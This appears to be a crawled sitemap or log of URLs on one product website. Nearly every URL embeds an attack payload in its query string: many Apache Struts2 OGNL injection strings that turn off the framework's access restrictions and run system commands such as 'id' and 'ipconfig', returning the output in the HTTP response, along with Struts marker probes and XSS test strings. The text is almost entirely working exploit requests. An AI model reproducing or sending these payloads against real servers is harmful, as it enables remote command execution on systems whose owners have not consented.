http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=fsm73586%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem81278? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=xsstest828 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm76414%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem87839?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=fsm76414%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem87839 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=fsm76414%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem87839? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=xsstest828? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f=osm55328%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem47874? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f=fsm58976%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem82712? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 